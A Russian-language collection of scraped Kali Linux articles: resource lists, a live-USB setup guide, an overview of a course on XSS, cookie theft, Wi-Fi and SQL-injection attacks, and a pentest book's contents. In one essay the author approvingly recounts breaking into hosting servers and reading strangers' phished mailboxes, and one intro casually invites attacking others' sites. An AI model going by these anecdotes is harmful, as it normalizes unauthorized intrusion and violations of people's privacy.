  47. 2.1 Устройство сетей
  48. 2.2 Понимание устройства и работы веб-сервера
  49. 2.3 Понимание устройства и работы веб-сайтов
  50. 3. Основы работы операционной системы Linux
  51. Заключительные слова

10 лучших ресурсов для изучения хакинга с помощью Kali Linux

Подборка 10 отличных ресурсов для изучения хакинга с помощью Kali Linux. Изучение данных материалов поможет вам раскрыть свои хакерские способности.

Kali Linux – это один из наиболее популярных дистрибутивов в сообществе специалистов по компьютерной безопасности и хакерских кругах. Причиной этому служит его возможность тестирования на предмет несанкционированного доступа и предоставление хакерского программного обеспечения. Данная система является одной из наилучших операционных систем в области компьютерной безопасности, которая базируется на ядре Linux и является приемником BackTrack. Kali Linux был обновлён до версии 2016.1, данная версия базируется на системе Debian GNU/Linux 8 (Jessie) и является официальным образом Kali Linux., который можно запустить на любой платформе. Несмотря на все эти хакерские инструменты, позволяющие стать хакером или специалистом в области компьютерной безопасности, какой от них толк, если ты не знаешь, как ими пользоваться!

По этой причине в данной статье собраны 10 лучших ресурсов по Kali Linux для хакеров и специалистов в области компьютерной безопасности.

1. Установка Kali Linux и основы командной строки Linux.

Начнем с данного YouTube туториала, который научит вас, как установить базовый Linux и Kali Linux на ваш компьютер.

2.Основы изучения хакинга с помощью Kali Linux и туториалы по безопасности из блога Kali Linux.

Блог Kali Linux сам по себе является отличным ресурсом для изучения различных инструментов и хакерских программных средств.

3. Взламываем любую Wi-fi сеть, с помощью Kali Linux.

Данный YouTube туториал научит вас, как взломать любую Wi-fi сеть, с помощью Kali Linux

4. Взлом беспроводной сети, защищённой технологиями WPA/WPA2, с помощью Kali Linux.

Данный YouTube туториал является продвинутой версией предыдущего туториала. В этом видео вы научитесь, как взламывать Wi-fi сети, защищенные технологиями WPA/WPS.

5. Загружаем и запускаем Kali Linux на Android устройствах.

На нашем портале Techworm уже есть отличный туториал на эту тему, но данный YouTube туториал отлично дополняет его.

6. Сертифицированный курс по теме несанкционированного доступа: Облегченная версия.

Если вы хотите подтвердить свои знания в области хакинга с Kali Linux, то перейдите по ссылке выше на обучающий портал Udemy. Данный облегченный курс содержит 16 лекций и 2 часа полезного контента, предлагающего вам основы несанкционированного доступа в платформе Kali Linux. Если вы хотите пройти полноценный курс, то зарегистрируйтесь на портале Udemy и получите доступ к данному курсу.

7. 20 вещей, которые нужно сделать после установки Kali Linux – отличная статья для начала знакомства с Kali Linux.

Данная ссылка объясняет, что вы можете делать с помощью Kali Linux.

8. Мониторинг сети, с помощью Kali Linux.

В данном туториале мы изучаем мониторинг сети, используя Kali Linux.

9. Туториал по Kali Linux, на примере тестирования на предмет несанкционированного доступа.

Еще один отличный YouTube туториал научит вас, как проводить тестирование на предмет несанкционированного доступа, с помощью Kali Linux.

10. Туториалы по Kali Linux.

Данный сайт полностью посвящен изучению Kali Linux. С тем количеством туториалов, доступных на данном сайте, вы с легкостью изучите основы Kali Linux и перейдете к изучению более продвинутых тем, которые также доступны на сайте.

Источник

Руководство по Kali Linux 2020. Установка с сохранением данных и полная настройка системы. + Слив курса по Kali Linux

В этом руководстве мы создадим Kali Linux 2020 Live USB в Windows и настроим сохранение файлов между перезагрузками, а также разберём то, как полностью настроить систему

Kali linux 1

В этом руководстве мы создадим Kali Linux 2020 Live USB в Windows и настроим постоянный раздел, чтобы мы могли сохранять файлы и настройки между перезагрузками. Дальше мы разберём то, как полностью настроить систему для работы после установки. А в конце вас ждёт курс по изучению этой операционной системы. *Это руководство также работает с Kali Linux 2019 и 2018.

Установка

image

В этом руководстве мы используем 64-битный (прямой) образ Kali Linux, хотя он также должен хорошо работать с 32-битным образом.

Запись Kali Linux 2020 Live ISO на USB

Запишите ISO-образ на USB-накопитель с помощью инструмента Universal USB Installer или UNetbootin. В этом руководстве мы используем Universal USB Installer.

Запись Kali Linux 2020 Live ISO на USB может занять несколько минут.

universal usb installer kali

Изменение размера раздела USB

Теперь, когда ISO-образ Kali Linux 2020 записан на USB-накопитель, мы можем приступить к настройке разделов для работы с Kali Live Persistence. Вы можете настроить разделы с помощью менеджера разделов по вашему выбору, но в этом руководстве мы будем использовать MiniTool Partition Wizard

После установки запустите и выберите « Управление дисками и разделами».

minitool partition wizard free

minitool partition step2b

Измените размер раздела до 4 ГБ и нажмите ОК. Это раздел, в котором находятся системные файлы Kali Linux, и ему не нужно больше 4 ГБ.

minitool partition step3

Создание постоянного раздела

Теперь мы создадим раздел persistence, в котором будут храниться ваши личные файлы и настройки Kali.

minitool partition step4b

Нажмите Да, если вы видите сообщение Новый созданный раздел не может быть использован в Windows. Потому что Windows может распознать только первый раздел на съемном диске. Вы хотите продолжить?”

В поле Метка раздела введите persistence. Важно, чтобы вы написали это правильно.

minitool partition step5

Наконец, нажмите Применить в верхнем левом углу и нажмите Да, чтобы применить изменения.

minitool partition step6b

Мастер разделов теперь настроит ваши разделы. Это может занять некоторое время в зависимости от размера вашего USB-накопителя.

minitool partition step7

После этого закройте Мастер разделов и безопасно извлеките USB-накопитель.

Загрузитесь в Kali 2020 Live USB

Для загрузки с USB вам нужно зайти в BOOT-меню (На всех компьютерах разные способы, вам нужно загуглить). И далее в BOOT-меню выбрать свою флешку

kalimenu2

Монтирование Persistence-раздела

Как только Kali загрузится, мы будем использовать fdisk для просмотра дисковые устройства и разделов.

Откройте новое окно терминала и запустите:

Вы увидите несколько записей для разделов и устройств в списке. Ищите свой USB-накопитель. Он будет иметь два раздела: раздел на 4 ГБ и постоянный раздел, созданный ранее. Раздел Persistence должен отображаться как Linux в столбце Type.

ВАЖНО: Вы должны точно ввести эти команды и убедиться, что вы выбрали правильное устройство (ваше может и не быть sdb2 ), иначе сохранение не будет работать.

Создайте новый файл persistence.conf с помощью текстового редактора nano.

В этом файле /mnt/my_usb/persistence.conf введите

Теперь размонтируйте ваш постоянный раздел.

Перезагрузите компьютер, снова загрузитесь с USB и с этого момента всегда выбирайте Live system (persistence, check kali.org/prst)

kalimenu2

Чтобы проверить, правильно ли работает сохранение данных, попробуйте создать пустую тестовую папку на рабочем столе и перезапустить. Снова выберите Live system (persistence, check kali.org/prst) и, если папка для тестирования все еще там, сохранение работает правильно.

Настройка системы

Установите часовой пояс

После того, как вы войдете в систему с правами root, первое, что вы заметите, это то, что время может быть неправильно установлено, и это вызовет проблемы при доступе к веб-сайтам. Вы можете легко изменить его, используя графический интерфейс:

Щелкните правой кнопкой мыши на часах сверху

Set the Time Zone

Select Properties

Установите местное время. Вы также можете найти множество атрибутов для изменения по умолчанию

Set the local time

Включить звук загрузки

Одной из проблем, с которыми сталкиваются пользователи Kali, является отсутствие звука при установке. Чтобы включить его, введите команду в терминале

nable Boot Sound

Update и Upgrade

Рекомендуется Update и Upgrade все устаревшие репозитории, чтобы повысить производительность

Update and Upgrade

Apt-update обновит доступные пакеты и версии

Apt upgrade установит новую версию имеющихся у вас пакетов

Установить новый пароль для root

При установке ОС вы указали пароль, но что если вы захотите изменить пароль через некоторое время? Вот команда для легкого изменения пароля root:

Set New Password for Root

Таким образом, вы можете легко изменить свой пароль, набрав только одну команду.

Добавить учетную запись с низким уровнем привилегий

Вы получили приглашение к учетной записи root, но при запуске от имени учетной записи root существует вероятность того, что небольшая ошибка в приложении может стереть некоторые системные файлы, поэтому в любой операционной системе рекомендуется запускать как пользователь без полномочий root с низким уровнем доступа. Чтобы создать нового пользователя с низкими привилегиями:

Add a Low Privileged Account

Добавьте этого пользователя в группу Sudoers для запуска корневых команд:

Sudoers group

Sudoers group 1

После этого напишите команду для настройки нового пользователя для BASH:

ehackings login shell

Установка оболочки входа пользователя ehacking в /bin/bash

Установить Git

Git – обязательный инструмент для этических хакеров, стремящихся увеличить свой набор инструментов по сравнению с тем, что уже установлено в стандартных репозиториях Kali. Чтобы установить Git, просто наберите:

Install Git

Установите ваши любимые инструменты взлома

Get Your Favorite Hacking Tools

Дайте разрешения, чтобы сделать его исполняемым, набрав:

Run the file

Установите браузер TOR

Onion Router (TOR) – это бесплатное программное обеспечение с открытым исходным кодом для анонимного общения. Он предназначен для того, чтобы люди не могли отслеживать ваши привычки, в том числе правительственные учреждения и корпорации. Вы можете установить браузер TOR, добавив репозиторий TOR в свой репозиторий APT:

затем загрузите ключ пакета и импортируйте его в ваш набор ключей APT:

Введите apt-get update:

Install TOR browser

После обновления установите TOR:

After updating install TOR

Установить Tilix

Tilix – это эмулятор терминала с открытым исходным кодом, который использует виджет VTE GTK + 3, обладающий некоторыми удивительными функциями, такими как макеты терминалов любым способом, разделяя их по горизонтали или вертикали, и ввод можно синхронизировать между терминалами, чтобы команды, набранные в одном терминале, реплицировались в другие

Install

Type tilix at prompt to launch

Установить редактор кода

Atom editor – очень хороший текстовый редактор в Kali Linux. Чтобы установить Atom введите:

Источник

Лучший хакерский курс с Kali Linux на русском языке

Если нужно получить доступ к серверу, поправить работоспособность чужой сети или побаловаться с чьим-то сайтом – Kali Linux вам в помощь.

В этой статье будем рассматривать отличный видеокурс по взлому сайтов, SQL-инъекциям и прочим интересным штукам, которые наиболее удобно реализовать с Kali Linux.

Установка и обновление Kali Linux

В первой части курса рассматривается установка дистрибутива Kali Linux на виртуальную машину VMWare со всеми встроенными инструментами. Для тренировок будет использоваться виртуальная машина OWASP Broken Web Application, в которой находятся сайты с уязвимостями: их-то мы и будем мучить. Также обновим операционную систему.

Рекомендуем к просмотру видео по установке Kali Linux с флешки:

Ну и конечно же установим Kali Linux на эту самую флешку, сохранив при этом все пользовательские данные:

Удаленный взлом компьютера через интернет (часть 1)

Небольшое ознакомительное видео о том, что такое XSS:

В следующем ролике автор рассказывает про XSS-уязвимость сайта, через которую будет взламываться удаленный компьютер. XSS – очень старая, но до сих пор работающая технология взлома. Если у вас есть свой сайт, проверьте, не выполняет ли он пользовательские скрипты, если их ввести, например, в поле комментария? Через эту брешь при помощи инструмента Beef было взломано множество ресурсов…

А данный видеоурок позволит рассмотреть работу XSS-атаки изнутри:

Удаленный взлом компьютера через интернет (часть 2)

Это вторая часть обучающего материала про межсайтовый скриптинг. В ролике автор показывает, как исполнить скриптовую Reflected-атаку на пользователя через сайт с брешью в безопасности. С помощью инструмента Burp Suite получаем хеш ссылки, по которой открывается скрипт и подсаживаем наш ужасный hook ничего не подозревающему пользователю. Когда пользователь откроет целевую страницу, его компьютер окажется в наших руках.

Еще один полезный туториал по взлому с использованием Burp Suite, но без необходимости использовать платный инструментарий:

Что такое cookies в браузере

Автор рассматривает базовые понятия о cookies и средства безопасности в самом браузере для защиты “печенек” от злоумышленника. Будем воровать cookies из браузера Chrome того пользователя, которого взломали на прошлом уроке. Используется по-прежнему многофункциональный инструмент Beef и JS-скрипты, чтобы представиться сайту под именем нашего тестового пользователя.

Другой способ украсть «куки» с использованием Kali Linux:

Взлом Wi-Fi пароля WPA2

В этом ролике автор будет показывать, как с помощью встроенного в Kali Linux инструмента Aircrack-ng можно получить доступ к защищенному роутеру. Будет рассмотрено, как создать флешку с Live CD с Linux-ом для тех случаев, когда на вашем компьютере нет беспроводного адаптера или он не поддерживается Aircrack-ng. Взлому будет подвергаться роутер на котором включен MAC-фильтр, шифрование WPA2 + имя сети будет скрыто.

Еще одно видео по взлому Wi-Fi

Мы также подобрали видео, которое не обрывается. Автор максимально доступно объясняет возможные уязвимости и способы их использования. Вы узнаете, почему Wi-Fi сеть никак не может быть на 100% защищенной.

Взлом WEB-сайтов: SQL-инъекции (часть 1)

В первой части этого урока будем разбираться, как “подсунуть” целевому серверу логин и пароль для входа, если мы этого не знаем. Данный распространенный вид атаки подразумевает под собой обман SQL-базы через подстановку передаваемых параметров. Для этого могут понадобиться дополнительные знания ответов web-сервера и понимание базовых вещей в MySQL.

Взлом WEB-сайтов: SQL-инъекции (часть 2)

Продолжаем изучать процесс взлома сайта через логин и пароль. В этом уроке используется локальное прокси браузера и встроенный инструмент Burp Suite для перехвата отправляемых параметров из web-сервера в базу данных. Для понимания урока и облегчения применения знаний на практике хорошо бы знать тонкости работы запросов GET/POST, а также углубленное понимание SQL-синтаксиса.

Второе видео по SQL-инъекциям хоть и короткое, но очень информативное:

Также можно обратиться к развернутой лекции:

Взлом пароля пользователя

В этом ролике будем получать пароли пользователей Windows. Из-за того, что пароли хранятся в виде одностороннего шифрования, понадобится специальный инструмент, чтобы расшифровать строку и получить искомое. Использоваться будет программка Cain and Abel. Эту манипуляцию нельзя назвать взломом, а скорее расшифровкой, но несмотря на это – информация полезная.

Также предлагаем ознакомиться с другими нашими статьями, которые посвящены взлому паролей:

Источник

Как стать хакером с Kali Linux

Kali Linux видится многим как «хакерская» операционная система. Сами хакеры, особенно в молодёжной среде, воспринимаются c восхищением. Отсюда понятен интерес молодых людей к Kali Linux. Они пробуют её установить запустить и у них возникает масса «детских» вопросов. Отвечать на эти вопросы нужно, какими бы простыми, наивными или некорректными они не были. Лично для меня неприемлемо поведение «бывалых», которые на такие вопросы отвечают «а зачем тебе?», «опять каникулы в школе?», «за такие глупые вопросы нужно уже банить?» и т.д. Этим хамством забиты российские технические форумы. Подобного я не позволяю себе и не позволю другим на codeby.net и FreeForum.biz. Абсолютно каждый, каким бы большим специалистом он не стал сейчас, начинал с изучения азов, начинал с «детских» вопросов. Те, кто не задаёт простых вопросов, в конечном счёте, так и не узнает на них ответов.

Настройка, работа Kali Linux вызывает вопросы и у продвинутых пользователей Linux. Но эти вопросы являются сложными или творческими. И, с одной стороны, хочется помочь всем начинающим (т.к. сам таким был), а с другой стороны, не хочется скатываться до совсем ясельного уровня. Ведь отвечать на банальные вопросы и не интересно, и жалко времени.

Поэтому для всех начинающих хакеров я подготовил список из того, что нужно изучить. По каждому пункту я буду стараться пояснить, для чего это нужно знать.

1. Основы языков программирования

1.1 HTML

На самом деле, HTML — это даже не язык программирования, а язык разметки, т.е. он используется, грубо говоря, для оформления текста.

Как он может помочь начинающему хакеру? Приведу мой личный пример. У одного из провайдеров Интернета, услугами которого я пользовался (местный провайдер с домовой городской сетью), был (может и сейчас есть — не знаю, давно ушёл от этого провайдера) свой сайт и свои собственные сервисы для пользователей. В начале 2000х это было актуально — Интернет-трафик (внешний) был платный, поэтому все старались пользоваться локальными ресурсами. Эти ресурсы, безусловно, были очень популярны. Один из самых популярных — файлообменник. Из-за постоянных злоупотреблений пользователей (например, «раздетая» с помощью Фотошопа одноклассница Маша) владелец файлообменника ввёл обязательный пароль. Этот пароль генерировался автоматически, и он не мог содержаться в комментарии к файлу. Так вот, анализ формы для отправки файла и некоторые эксперименты с ней показали, что пароль содержится в одном из скрытых полей формы, которое, естественно, можно редактировать. На сервере этот пароль ничем уже не проверялся. В результате, сохранив форму для загрузки файла себе на компьютер и чуть отредактировав её, удалось сделать так, чтобы файлы можно было опять загружать без пароля. Этой формой мог пользоваться любой клиент провайдера. Позже провайдер «закрыл» дыру — стал проверять наличие пароля. Тем не менее, такими же простыми манипуляциями удалось сделать так, что файлы загружались всегда со «стандартным» паролем («0000», вроде) плюс этот пароль можно было записывать в комментарий к файлу.

Те, кто знаком хотя бы с основами HTML, прекрасно понял, о чём я говорю. Для остальных — это просто китайская грамота.

Ещё один свеженький пример. Буквально на днях (11 февраля 2015 года), была обнаружена дыра в теме WordPress, которая позволяет закачивать производные файлы на сервер. Описание этой темы здесь. Уязвимой в этой теме является файл admin/upload-file.php. Я нашёл эту тему и нашёл этот файл. Файл совсем короткий, поэтому я приведу его полностью:

Этот файл на PHP, но, чтобы воспользоваться этой уязвимостью, нужно сделать форму отправки файла именно на HTML.

Итак, HTML нужно знать, чтобы: а) искать уязвимости; б) использовать уязвимости. Есть и более продвинутые задачи, для выполнения которых нужно знать HTML, но остановимся на этом.

1.2 PHP

Выше я привёл содержание крошечного файла, написанного на PHP. Этот файл содержит такую брешь, что уже не важно, насколько хорошо настроен сервер, есть ли файловый файервол и т.д. Если кто-то использует эту тему — то сайт этого человека в полной нашей власти (а если сервер/хостинг криво настроены, то весь компьютер под нашим управлением). Но ведь чтобы это понять, нужно хоть чуть-чуть знать PHP.

Чтобы использовать готовые эксплойты, которые написал кто-то другой, опять же, нужно знать хотя бы основы PHP, чтобы знать куда записать адрес сайта и другие переменные величины, и как вообще запустить этот скрипт.

1.3 MySQL

Обычно, самое интересное находится в базах данных. Чтобы понять, как использовать MySQL-инъекцию, нужно знать, что такое MySQL-инъекция. Чтобы уловить суть MySQL-инъекции, нужно знать, что такое MySQL-запросы, каков синтаксис этих запросов, каково устройство базы данных, как хранятся данные, что такое таблицы и т.д.

Вообще, первые три пункта, а также представления об устройствах веб-сайтов, проще всего постичь, если учиться не «взламывать» веб-сайты, а их создавать. Учитесь с целью сделать что-то позитивное. В этом есть парадокс, ведь точно также, чтобы научиться хорошо защищать веб-приложения, нужно учиться их взламывать! Только сумев посмотреть на веб-технологии глазами взломщика, можно получить бесценный опыт. Точно также и с сайтами — простое изучение функций и основ языка мало пригодиться. Нужно стать веб-разработчиком, чтобы понять всю изнанку веб-сайта.

1.4 JavaScript, JQuery

Хотя бы нужно знать, что на веб-сайтах управляется, зависит от JavaScript. Ведь на некоторых сайтах, которые на дают выделить (и/или скопировать) содержимое, не дают скачать файл или не дают посмотреть содержимое достаточно просто отключить JavaScript, чтобы всё это стало возможным.

Ну а чтобы отключить JavaScript, нужно знать: а) в каких ситуациях работа (защита) сайта зависит от него; б) как JavaScript подключается и какими способами можно блокировать работу скриптов.

2. Основы устройства сетей, работы веб-серверов и веб-сайтов

2.1 Устройство сетей

Вышеперечисленное нужно знать на первых порах хотя бы для того, чтобы понимать базовые компьютерные тексты и инструкции. А ещё для осознания факта, что анонимность в интернете — это вещь эфемерная.

Продвинутые знания о построении сетей в дальнейшем помогут проводить результативные сканирования с помощью специальных программ.

2.2 Понимание устройства и работы веб-сервера

Как и в предыдущих пунктах, начну с простого примера (кстати, совсем недавнего). При посещении одного из серверов, было обнаружено, что настройки сервера позволяют просматривать содержимое каталогов (листинг файлов). На сервере был найден phpMyAdmin, но стандартные пароли к нему не подходили. Блуждая по каталогам в попытке найти уязвимые скрипты (там самописные скрипты для обработки записей в больницу и раздачи «номерков») был найден текстовый (!) файл содержащий одну строчку с двумя словами, разделёнными запятой. Как оказалось, это и был логин с паролем для phpMyAdmin. База данных, как говориться, наша из-за клинической глупости разработчика, но вот для записи своего файла на сервер понадобились знания об этом сервере. Например, нужно знать абсолютный путь, куда будет произведена запись шела. Чтобы знать абсолютный путь, нужно хотя бы знать структуру каталогов сервера Apache.

Этим примером я хочу сказать не то, что нужно выучить структуру Apache. Я хочу сказать, что без знаний о работе, об общих принципах устройства веб-сервера, постоянно будете натыкаться на невозможность в полной мере «раскрутить» уязвимость, даже если она уже найдена.

Помните что я говорил про языки программирования и про понимание принципов работы веб-сайтов? Чтобы понять всю глубину нужно самому стать веб-разработчиком. Чтобы понять веб-сервер, нужно читать книжки не по взлому веб-сервера, а по его обслуживанию. Т.е. нужно самому стать системным администратором, и осознание слабых мест, в какие стороны, при попытке проникнуть на веб-сервер, нужно «капать», придёт само.

2.3 Понимание устройства и работы веб-сайтов

Вообще, очень много станет ясно уже при изучении языков программирования для веб-приложений.

Чтобы продолжить знакомство с устройством веб-сайтов, желательно иметь опыт по работе с популярными системами управления контентом, с популярными движками и скриптами. Знать как устроены плагины и темы, где они располагаются, какие файлы могут представлять интерес и т.д.

Это очень, казалось бы, банальная информация позволила создать очень простой, но потрясающе эффективный «хак»

Когда я открыл это для себя, я ещё пользовался бесплатным хостингом (название домена компании holm.ru или holms.ru — они ещё раздавали домены третьего уровня вида *.h7.ru, *.h10.ru, т.е. цифры там последовательно менялись, по мере заполнение серверов).

Я применил эти несколько строчек, которые привёл чуть выше и оказалось, что я могу выходить за границы выделенной мне папки. Чуть усовершенствованный скрипт позволил мне не просто просматривать корень сервера, а переходить во внутрь папок, которые я видел и открывать файлы для просмотра. Результат был потрясающим! Я очень много узнал о чужих сайтах. Главное открытие, что соотношение «нормальных сайтов» к «ненормальным» (мошенническим, бессодержательным, просто пустым) не в пользу «нормальных». Попадались «сайты знакомств» (я до сих пор иногда встречаю такие), где очень красивая «обложка» — главная страница, с симпатичными людьми, которые как бы уже являются пользователями сайта. И если хочешь с ними начать общаться, то нужно зарегистрироваться и что-то там ввести или заплатить. А на самом деле внутри веб-сайта кроме этих десяти фотографий больше ничего и нет. Это сейчас всем понятно — но в своё время Интернет-мошенничество я изучал именно так.

Но самое потрясающее, что обнаружил, это сайты в названии доменных имён которых встречалось слово mail. «Снаружи» эти сайты состояли из одной единственной страницы, полностью идентичной странице входа в почту mail.ru. А вот внутри там лежало несколько файлов, один из которых почти всегда оказывался собранными парами логин-пароль. Т.е. кто-то под разными предлогами (посмотреть открытку, например), заманивал пользователей на эту страницу, ничего не подозревающие пользователи вводили свои данные и они уже попадали к хакеру.

Скомпрометированных учётных записей было много (со всех сайтов я набрал больше сотни). Примерно в половине случаев пароль не подходил (пользователь успел его сменить), либо почтовый ящик был полностью пустой (пользователь что-то заподозрил и удалил все письма). Но вот вспоминая вторую половину, я до сих пор мучаюсь догадкой: люди, когда думают что никто не узнает, действительно такие еба… странные или мне просто повезло с подборкой? Из интересных ящиков очень многие, так или иначе, содержали переписку по обмену интимными фотографиями, разговоры «ниже пояса», причём в значительной части была затронута и тема несовершеннолетних. Я до сих пор помню фотку переодетого в женский наряд мужчины (чулки и вообще полный набор), который прислал её женщине, которая интересовалась женщинами (мужчина убеждал, что он — это женщина), чтобы она в ответ прислала свои «голые» фотки. А на что готов пойти ты, чтобы увидеть фотографию голой женщины? 🙂

Вполне возможно, что это были какие-нибудь следственные мероприятия, такой способ негласного получения информации от личностей, которые попали в поле зрение правоохранителей. Я всё-таки отказываюсь думать, что люди в своей большой (или хотя бы в значительной массе) такие.

Трудно не согласиться с Виктором Пелевиным

Просто ассемблер чужой души при близком рассмотрении редко выглядит привлекательно.

3. Основы работы операционной системы Linux

Чем больше вы знаете про Linux, тем лучше. Хотя бы уже потому, что огромное количество веб-серверов в Интернете в качестве операционной системы использует Linux.

Я рассказал свой случай про выход за пределы из выделенного мне на хостинге каталога. У другого хостера, мне удалось попасть в корневой каталог файловой системы (а вот сайты оказались недоступными, поскольку права на папки были прописаны правильно). И представьте ситуацию: я мечусь по папкам сервера, ведь нужно быстрее хватать что-нибудь ценное, пароли разные и т.д. А где что лежит у Linux’а? В какие каталоги надо переходить и какие файлы скачивать? Я был совершенно не знаком тогда с Linux и главный вывод, который я сделал для себя после того случая — нужно разбираться с Linux, иначе никак.

Многие программы для анализа сетей и веб-сайтов на проникновение работают на Linux. Нужно знать, как установить, как запустить (если это консольная программа).

Вообще, в непривычной ОС пользователи иногда не знают, как скопировать файл, или как его открыть, или как установить новую программу, или «где диск D» и т.д. В общем, изучайте Linux в самых разных его аспектах.

И начтите своё изучение не с Kali Linux, а, например, с Linux Mint.

Kali Linux — она не очень подходит для новичков. Даже в дружелюбной Linux Mint могут возникать вопросы по обычному использованию. Что уж говорить про Kali Linux. Все программы, которые есть в Kali Linux, прекрасно могут работать и на других версиях Linux. Я бы рекомендовал так: в качестве основной ОС использовать Linux Mint, а после изучения новых программ устанавливать их в Linux Mint или же, в качестве виртуальной машины (второй ОС) использовать Kali Linux.

Заключительные слова

Я привёл несколько примеров из своих экспериментов по обходу ограничений и проникновению. В скольких из них я использовал Kali Linux? Ни в одном. Я прекрасно помню своё первое знакомство с предшественницей Kali Linux — я установил в виртуальный компьютер, посмотрел меню (там непонятные английский названия), попробовал запустить некоторые программы (почти всегда открывалась командная строка), понял, что здесь ВООБЩЕ ничего не понятно, всё закрыл и удалил.

Изучайте языки программирования (PHP, MySQL, HTML), новые технологии, Linux, устройство и работу сервера. Старайтесь мыслить в созидательном русле (как сделать сайт, как обслуживать сервер, как эффективно работать в Linux) и понимание глубинных процессов придёт само. А именно это (знание и понимание происходящих процессов) и есть главное богатство хакера. Не нужно зацикливаться на Kali Linux. Изучение Kali Linux без знания того, что я перечислил выше — это равносильно построению дома без фундамента.

Источник

Гид по Kali Linux: тестирование на проникновение

18 ноября, 2016

Представляем вашему вниманию полный Гид по

Kali Linux

: тестирование на проникновение, книгу пригодную для использования как новичками так и уже опытными администраторами и экспертами ИБ для целей проведения аудита безопасности ИТ-инфраструктуры. Книга состоит из 8 частей, в которые входят 62 главы с подробным описанием используемых инструментов и методики тестирования.

Книга является систематизированным сборником, включающим переводы англоязычных ресурсов, книг и веб-сайтов посвященных теме penetration testing и собственного опыта авторов.

Официальное описание к книге:

Kali Linux

является передовым Linux дистрибутивом для проведения тестирования на проникновение и аудита безопасности. Информация в данной книге предназначена только для ознакомления или тестирования на проникновение собственных сетей.

Для тестирования сетей третьих лиц, получите письменное разрешение.

«Тестирование на проникновение (жарг. Пентест) — метод оценки безопасности компьютерных систем или сетей средствами моделирования атаки злоумышленника.» — WiKi.

Вся ответственность за реализацию действий, описанных в книге, лежит на вас. Помните, что за неправомерные действия предусмотрена ответственность, вплоть до уголовной.

Книга состоит из 8 частей, в которые входят 62 главы. Все подробно рассказывается с использованием примеров. В книге используется самая актуальная информация на сегодняшний день.

Содержание

1. Общая информация и установка Kali Linux

  • Что Такое Kali Linux?
  • Как установить Kali Linux: подробная инструкция для установки на компьютер и в виртуальную машину
  • Установка Дополнений гостевой ОС VirtualBox для Kali Linux 2.0
  • Как установить Kali Linux на флешку и на внешний диск (простой способ)
  • 10 лучших подсказок того, что нужно сделать после установки Kali Linux 2.0
  • Инструменты VMware в гостевой системе Kali
  • Как включить VPN на Kali Linux — разрешение проблемы с невозможностью добавить VPN
  • Проверка и восстановление репозиториев в Kali Linux из командной строки
  • Как поменять среду рабочего стола в Kali Linux
  • Как добавить/удалить обычного (не рута) пользователя в Kali Linux
  • Как сбросить пароль root’а в Kali Linux
  • Восстанавливаем GRUB в Kali Linux после обновления до Windows 10
  • Повышаем свою анонимность в Интернете с Tor в Kali Linux

2. Обзор инструментов Kali Linux

  • Обзор разделов инструментов Kali Linux. Часть 1. Краткая характеристика всех разделов
  • Обзор разделов инструментов Kali Linux. Часть 2. Инструменты для сбора информации
  • Лучшие хакерские программы
  • База данных эксплойтов от Offensive Security (создателей Kali Linux)

3. Тестирование на проникновение беспроводных сетей

  • Лучшие совместимые с Kali Linux USB Wi-Fi адаптеры
  • Взлом Wi-Fi пароля (WPA/WPA2), используя pyrit и cowpatty в Kali Linux
  • Взлом Wifi WPA/WPA2 паролей с использованием Reaver
  • Модификация форка Reaver — t6x — для использования атаки Pixie Dust
  • Взлом паролей WPA2/WPA с помощью Hashcat в Kali Linux (атака перебором Wi-Fi паролей по маске)
  • Мод Wifite с поддержкой Pixiewps
  • Взлом Wi-Fi сетей: инструменты, которые не попали в Kali Linux
  • Router Scan by Stas’M на Kali Linux (взлом роутеров и Wi-Fi в промышленных масштабах)
  • Чиним Wifi_Jammer и Wifi_DoS в WebSploit
  • Стресс-тест беспроводной сети с Wifi_Jammer: как глушить Wi-Fi
  • Стресс-тест беспроводной сети с Wifi_DoS: как досить Wi-Fi

4. Стресс-тесты сети

  • Стресс-тест сети (DoS веб-сайта) со SlowHTTPTest в Kali Linux: slowloris, slow body и slow read атаки в одном инструменте
  • Стресс-тест сети: DoS веб-сайта в Kali Linux с GoldenEye
  • Стресс-тест сети с Low Orbit Ion Cannon (LOIC)
  • Стресс-тест сети: DoS с использованием hping3 и спуфингом IP в Kali Linux

5. Анализ уязвимостей в веб-приложениях

  • Инструкция по WhatWeb: как узнать движок сайта в Kali Linux
  • SQL-инъекции: простое объяснение для начинающих (часть 1)
  • Использование SQLMAP на Kali Linux: взлом веб-сайтов и баз данных через SQL-инъекции
  • Хакерские плагины для Firefox
  • Сканируем на уязвимости WordPress: WPScanner и Plecost
  • Новая версия Plecost 1.0.1 — программы для поиска уязвимостей WordPress
  • Работа с W3af в Kali Linux
  • ZAProxy: тестирование на проникновение веб-приложений
  • Как запустить Metasploit Framework в Kali Linux 2.0
  • Как запустить Metasploit Framework в Kali Linux 1.1
  • Metasploit Exploitation Framework и searchsploit — как искать и как использовать эксплойты
  • DIRB: поиск скрытых каталогов и файлов на веб-сайтах
  • Поиск админок сайтов с Kali Linux

6. Анализ уязвимостей в операционных системах и серверном программном обеспечении

  • Сканирование уязвимостей с OpenVAS 8.0
  • Инструкция по Armitage: автоматический поиск и проверка эксплойтов в Kali Linux
  • Как сканировать Linux на руткиты (rootkits) с помощью rkhunter
  • Аудит безопасности Linux
  • Установка Linux Malware Detect (LMD) на Linux
  • Как УЗНАТЬ пароль Windows?

7. Сканирование сетей. Перехват данных в сетях

  • Эмуляция сети из нескольких компьютеров на одном компьютере
  • Как использовать сканер безопасности NMAP на Linux
  • Книга по Nmap на русском
  • Взлом пароля веб-сайта с использованием WireShark (и защита от этого)
  • FTP-Map: определяем программное обеспечение и его версию для FTP-серверов и ищем для них эксплойты
  • ZMap или Как просканировать все IPv4 адреса мира за 45 минут
  • 8. Атаки на пароли. Брутфорсинг
  • Списки слов для атаки по словарю: пароли, имена пользователей, каталоги
  • PW-Inspector: отбираем пароли соответствующие критериям
  • THC-Hydra: очень быстрый взломщик сетевого входа в систему (часть первая)
  • Брутфорсинг веб-сайтов с Hydra (часть вторая инструкции по Hydra)
  • Crunch — генератор паролей: основы использования и практические примеры
  • BruteX: программа для автоматического брутфорса всех служб


hack
Kali
Linux
penetration
test
vulnerability
white
взлом
пен тест
проникновение
тестирование
уязвимость

Alt text


Цифровой мир не прощает ошибок — подписывайтесь на наш канал и узнавайте, как избежать неприятностей и защитить свои данные!


Понравилась статья? Поделить с друзьями:
  • Руководство верховным судом осуществляет председатель верховного суда
  • Панель оператора ип320 овен руководство по эксплуатации
  • User manual вакууматор инструкция на русском языке
  • Котел бакси 4s инструкция для чайников на русском
  • Как сшить подзор для кровати своими руками пошаговая инструкция